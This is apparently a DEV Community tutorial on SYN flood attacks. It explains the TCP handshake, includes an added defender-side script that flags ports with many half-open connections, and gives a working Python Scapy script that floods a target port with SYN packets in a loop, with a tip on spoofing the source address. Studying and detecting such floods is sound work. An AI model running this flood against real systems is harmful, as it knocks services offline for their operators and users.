DEV Community

Grzegorz Piechnik

SYN Flood Attack

Some attacks persist over time with only slight modifications. One of the simplest, and one that can be used in various ways, is the SYN flood attack. Let's take a closer look at it.

What is a SYN flood attack?

To illustrate this, let's recall how the TCP protocol works.

      TCP A                                                TCP B

  1.  CLOSED                                               LISTEN
  2.  SYN-SENT    --> <SEQ=100><CTL=SYN>               --> SYN-RECEIVED
  3.  ESTABLISHED <-- <SEQ=300><ACK=101><CTL=SYN,ACK>  <-- SYN-RECEIVED
  4.  ESTABLISHED --> <SEQ=101><ACK=301><CTL=ACK>       --> ESTABLISHED
  5.  ESTABLISHED --> <SEQ=101><ACK=301><CTL=ACK><DATA> --> ESTABLISHED

What we need to know about this TCP communication is that the client (TCP A) requests a connection by sending a SYN message to the server (TCP B). The server responds with a SYN-ACK message, and the client replies with a final ACK. In this way, a connection is established. Here we also get to the heart of the matter.

In a SYN flood attack, the attacker sends SYN packets one after another, often to different network ports. The server responds to each connection attempt with a SYN-ACK packet and keeps the connection half-open in the SYN-RECEIVED state while it waits for a final ACK that never arrives. The ultimate goal is to overload the server and block its services.
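From the defender's side, the half-open state described above can be measured directly. The following is an added example, not part of the original post: it replays constructed client-to-server packet records and reports, per destination port, the peak number of connections stuck in SYN-RECEIVED. The function names, the record format, the 5-second timeout and the threshold of 100 are assumptions chosen for illustration.

```python
from collections import defaultdict


def half_open_peaks(events, timeout=5.0):
    """Replay client->server packets (ts, src, sport, dport, flags) and return
    {dst_port: peak number of connections with a SYN seen but no final ACK}."""
    pending = {}                 # (src, sport, dport) -> time the first SYN arrived
    peaks = defaultdict(int)
    for ts, src, sport, dport, flags in sorted(events):
        # Drop entries the server would already have timed out.
        for key in [k for k, t0 in pending.items() if ts - t0 > timeout]:
            del pending[key]
        key = (src, sport, dport)
        if flags == "S":
            pending.setdefault(key, ts)   # a retransmitted SYN is not a new entry
        elif "A" in flags or "R" in flags:
            pending.pop(key, None)        # handshake completed, or connection reset
        count = sum(1 for k in pending if k[2] == dport)
        peaks[dport] = max(peaks[dport], count)
    return dict(peaks)


def flooded_ports(events, threshold=100, timeout=5.0):
    """Ports whose half-open backlog ever exceeded the (assumed) threshold."""
    peaks = half_open_peaks(events, timeout)
    return sorted(port for port, n in peaks.items() if n > threshold)


def sample_events():
    """Constructed records, not captured traffic (documentation address ranges)."""
    ev = []
    # 20 normal clients on port 443: SYN, then the final ACK 50 ms later.
    for i in range(20):
        ev.append((i * 0.1, "198.51.100.10", 50000 + i, 443, "S"))
        ev.append((i * 0.1 + 0.05, "198.51.100.10", 50000 + i, 443, "A"))
    # Flood pattern on port 80: 300 SYNs in 0.3 s, and no ACK ever follows.
    for i in range(300):
        ev.append((1.0 + i * 0.001, f"203.0.113.{i % 254 + 1}", 1024 + i, 80, "S"))
    return ev


if __name__ == "__main__":
    print(half_open_peaks(sample_events()))
    print(flooded_ports(sample_events()))
```

Completed handshakes leave the table as soon as the ACK arrives, so the normal port never holds more than one pending entry, while the flooded port accumulates every unanswered SYN until the timeout.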

Construction of the script

To begin with, let's look at a simple script prepared in Python.

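from scapy.all import IP, TCP, Raw, RandShort, send

# Destination host and port
target_ip = "127.0.0.1"
target_port = 80

# IP layer addressed to the target
ip = IP(dst = target_ip)
# TCP layer: random source port, SYN flag set
tcp = TCP(sport = RandShort(), dport = target_port, flags = "S")

# 1 KB payload
raw = Raw(b"X"*1024)
# Stack the layers into one packet
p = ip / tcp / raw
# Send the packet repeatedly, without console output
send(p, loop = 1, verbose = 0)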

First, we initialize variables holding the IP address and port of the attacked machine. Then we create a packet whose destination address is the address of the attacked server (IP(dst = target_ip)). At this point it is worth mentioning that if we wanted to spoof the IP address of the opening connection, we can specify the optional parameter src when creating the instance of the IP class. In the following line (TCP(sport = RandShort(), dport = target_port, flags = "S")) we create a SYN packet with a random source port and target_port as the destination port. It remains to create the data (variable raw), stack the layers (ip / tcp / raw) and send the constructed packet in a loop. At best, the server will stop responding.

Sources

https://pl.wikipedia.org/wiki/SYN_flood
https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/
